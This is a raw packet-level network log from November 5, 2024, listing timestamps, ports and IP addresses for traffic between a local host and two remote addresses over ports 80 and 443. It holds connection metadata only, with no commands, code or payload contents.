Nov 5, 2024 18:46:10.080871105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080888033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080960989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081002951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.081058979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081074953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081087112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081094980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081101894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.081111908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.081137896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.081166029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081176996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081187010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.081212997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.081237078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.085114002 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.085139990 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.085190058 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.085199118 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.085247993 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.085292101 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.085452080 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.085455894 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.085465908 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.085469007 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.088357925 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.088376045 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.088457108 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.088629961 CET	49823	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.088641882 CET	443	49823	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.091402054 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.091540098 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.091595888 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.091629028 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.091629028 CET	49818	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.091641903 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.091649055 CET	443	49818	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.093508005 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.093552113 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.093632936 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.093755007 CET	49824	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.093770981 CET	443	49824	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.129597902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.129626036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.129636049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.129645109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.129653931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.129709005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.129753113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.129771948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.129817963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179225922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179235935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179241896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179246902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179253101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179263115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179270029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179344893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179356098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179367065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179372072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179378033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179389000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179404020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179431915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179476976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179486990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179496050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179505110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179514885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179521084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179524899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179537058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179549932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179577112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179588079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179598093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179609060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179619074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179636955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.179779053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179789066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179799080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179812908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179824114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179832935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179843903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179852962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179862976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179872990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.179883957 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180000067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.180160046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180170059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180181026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180190086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180202007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180211067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180216074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.180224895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180236101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180241108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.180248022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180253983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.180258036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180269003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180279016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180285931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.180289030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180299997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.180319071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.180336952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.191932917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.191943884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.191958904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.191987991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.191988945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192018986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192043066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192049980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192059994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192084074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192096949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192109108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192121029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192151070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192159891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192167997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192178965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192204952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192214012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192239046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192279100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192289114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192326069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192492008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192539930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192548990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192559958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192595959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192600965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192610979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192621946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192635059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192646027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192656040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192682981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192715883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192728043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192738056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192758083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192778111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192831993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192842960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192853928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192866087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.192887068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192902088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.192912102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193000078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193011045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193022013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193032026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193042994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193053961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193054914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193064928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193075895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193078041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193092108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193098068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193103075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193135023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193150043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193152905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193160057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193170071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193195105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193211079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193212032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193212032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193219900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193228006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193233013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193238020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193260908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193260908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193317890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193412066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193423033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193433046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193443060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193454981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193463087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193475962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193494081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193655014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193665028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193675041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193686008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193697929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193698883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193710089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193720102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193728924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193730116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193739891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193752050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193756104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193756104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193758011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193778992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193804979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193804979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193814993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193825006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193836927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193841934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193844080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193845034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193856001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193856955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193861961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193866014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.193885088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.193905115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.194065094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194077015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194087982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194098949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194108963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194116116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.194134951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194142103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194152117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194161892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.194169044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.194169044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.194169044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.194190025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.194219112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.198474884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198483944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198529005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.198612928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198621988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198657990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.198883057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198926926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198929071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.198944092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198956013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198962927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.198968887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.198988914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199002981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199003935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199023962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199073076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199078083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199089050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199124098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199145079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199168921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199178934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199204922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199228048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199593067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199618101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199628115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199656010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199672937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199698925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199723005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199727058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199763060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.199795008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.199837923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.200411081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.200422049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.200432062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.200449944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.200474024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.200484991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.200495005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.200510025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.200510025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.200540066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.201087952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201107025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201116085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201132059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.201155901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.201164961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201175928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201185942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201195955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201210976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.201222897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.201940060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201984882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.201987982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.202011108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202047110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.202168941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202213049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.202238083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202245951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202255011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202280998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.202294111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.202817917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202864885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.202902079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202910900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202920914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.202950001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.202960968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.203274965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.203283072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.203319073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.203325987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.203346968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.203355074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.203387976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.204092026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.204104900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.204116106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.204138994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.204159021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.204492092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.204509020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.204541922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.204574108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.204582930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.204596996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.204615116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.205360889 CET	80	49804	31.41.244.11	192.168.2.4
